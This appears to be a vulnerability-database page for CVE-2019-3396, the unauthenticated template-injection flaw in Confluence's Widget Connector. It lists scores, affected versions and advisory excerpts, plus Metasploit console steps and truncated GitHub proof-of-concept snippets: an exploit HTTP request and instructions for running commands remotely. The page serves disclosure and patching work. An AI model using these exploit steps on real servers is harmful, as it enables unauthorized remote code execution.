10
CVSSv2

CVE-2019-3396

Published: 25/03/2019 Updated: 22/04/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 prior to 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 prior to 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 prior to 6.14.2 (the fixed version for 6.14.x), allows remote malicious users to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Vulnerability Trend

Affected Products

Vendor Product Versions
AtlassianConfluence1.0, 1.0.1, 1.0.3, 1.1, 1.1.1, 1.1.2, 1.2, 1.2.1, 1.2.2, 1.2.3, 1.3, 1.3.1, 1.3.2, 1.3.4, 1.3.5, 1.3.6, 1.4, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 2.6, 2.6.1, 2.6.2, 2.6.3, 2.7, 2.7.1, 2.7.2, 2.7.3, 2.7.4, 2.8, 2.8.1, 2.8.2, 2.8.3, 2.9, 2.9.1, 2.9.2, 2.9.3, 2.10, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 3.0, 3.0.1, 3.0.2, 3.1, 3.1.1, 3.1.2, 3.2, 3.2.1, 3.3, 3.3.1, 3.3.3, 3.4, 3.4.1, 3.4.2, 3.4.3, 3.4.5, 3.4.6, 3.4.7, 3.4.8, 3.4.9, 3.5, 3.5.1, 3.5.2, 3.5.3, 3.5.4, 3.5.5, 3.5.6, 3.5.7, 3.5.9, 3.5.11, 3.5.13, 4.0, 4.0.3, 4.0.4, 4.0.5, 4.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.1.7, 4.1.9, 4.3, 4.3.1, 4.3.2, 4.3.3, 4.3.5, 4.3.6, 4.3.7, 5.0, 5.0.1, 5.0.2, 5.0.3, 5.1, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 5.1.5, 5.2.3, 5.2.4, 5.2.5, 5.3, 5.3.1, 5.3.4, 5.4, 5.4.1, 5.4.2, 5.4.3, 5.4.4, 5.5, 5.5.0, 5.5.1, 5.5.2, 5.5.3, 5.5.6, 5.5.7, 5.6, 5.6.1, 5.6.3, 5.6.4, 5.6.5, 5.6.6, 5.7, 5.7.1, 5.7.3, 5.7.4, 5.7.5, 5.7.6, 5.8.2, 5.8.4, 5.8.5, 5.8.6, 5.8.8, 5.8.9, 5.8.10, 5.8.13, 5.8.14, 5.8.15, 5.8.16, 5.8.17, 5.8.18, 5.9.1, 5.9.2, 5.9.3, 5.9.4, 5.9.5, 5.9.6, 5.9.7, 5.9.8, 5.9.9, 5.9.10, 5.9.11, 5.9.12, 5.9.14, 5.10, 5.10.0, 5.10.1, 5.10.2, 5.10.3, 5.10.4, 5.10.5, 5.10.6, 5.10.7, 5.10.8, 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.7, 6.1, 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.2, 6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.3, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.4, 6.4.1, 6.4.2, 6.4.3, 6.5, 6.5.1, 6.5.2, 6.5.3, 6.6, 6.6.1, 6.6.2, 6.6.3, 6.6.4, 6.6.5, 6.6.6, 6.6.7, 6.6.8, 6.6.9, 6.6.10, 6.6.11, 6.7.0, 6.7.1, 6.7.2, 6.7.3, 6.8, 6.8.1, 6.8.2, 6.8.3, 6.8.5, 6.9, 6.9.1, 6.9.3, 6.10, 6.10.1, 6.10.2, 6.11, 6.11.1, 6.11.2, 6.12, 6.12.1, 6.12.2, 6.13.0, 6.13.1, 6.13.2, 6.14.0, 6.14.1

Exploits

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remo ...

Mailing Lists

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution Authentication is not required to exploit this vulnerability By default, ...
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 This email refers to the advisory found at confluenceatlassiancom/display/DOC/Confluence+Security+Advisory+-+2019-03-20 CVE ID: * CVE-2019-3395 * CVE-2019-3396 Product: Confluence Server and Confluence Data Center Affected Confluence Server and Confluence Data Center product vers ...

Metasploit Modules

Atlassian Confluence Widget Connector Macro Velocity Template Injection

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embed online videos, slideshows, photostreams and more directly into page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is unrequired to exploit this vulnerability. By default, Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.

msf > use exploit/multi/http/confluence_widget_connector
      msf exploit(confluence_widget_connector) > show targets
            ...targets...
      msf exploit(confluence_widget_connector) > set TARGET <target-id>
      msf exploit(confluence_widget_connector) > show options
            ...show and set options...
      msf exploit(confluence_widget_connector) > exploit

Github Repositories

CVE-2019-3396

CVE-2019-3396 Confluence RCE漏洞检测脚本

CVE-2019-3396 Confluence 未授权 RCE (CVE-2019-3396) 漏洞 坑点:有些版本需要加Referer才能成功 File Read POST /rest/tinymce/1/macro/preview HTTP/11 Host: 101020181 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64; rv:550) Gecko/20100101 Firefox/550 Accept: text/plain, */*; q=001 Accept-Language: zh-CN,zh;q=08,en-US;q=05,en;q=03 Accept-Encoding: g

CVE-2019-3396_EXP CVE-2019-3396 confluence SSTI RCE 1、put the cmdvm on your website (must use ftp or https ,http doesn't work ) 2、modify RCE_exppy ,change the filename = 'ftp://1111/cmdvm' (python -m pyftpdlib -p 21) 3、python REC_exppy testwiki_testcc:8080 "whoami" $ python REC_exppy testwiki_testcc:8080 "id&q

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/11 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (X11; Linux x86_64; rv:600) Gecko/20100101 Firefox/600 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraftaction?draf

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC POST /rest/tinymce/1/macro/preview HTTP/11 Host: xxxx Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/50 (X11; Linux x86_64; rv:600) Gecko/20100101 Firefox/600 Content-Type: application/json; charset=utf-8 Referer: xxxx/pages/resumedraftaction?draf

EGI Foundation Security Announcements 2019-04-10 security incident affecting collaboration tools 2019-04-16 Initial public announcement Last Wednesday, 10 April 2019, an intrusion was detected on the site used to host collaboration services for EGI, including the EGI SSO Identity Provider, Confluence installation of the EGI Foundation and the EOSC-hub and ENVRI+ projects The f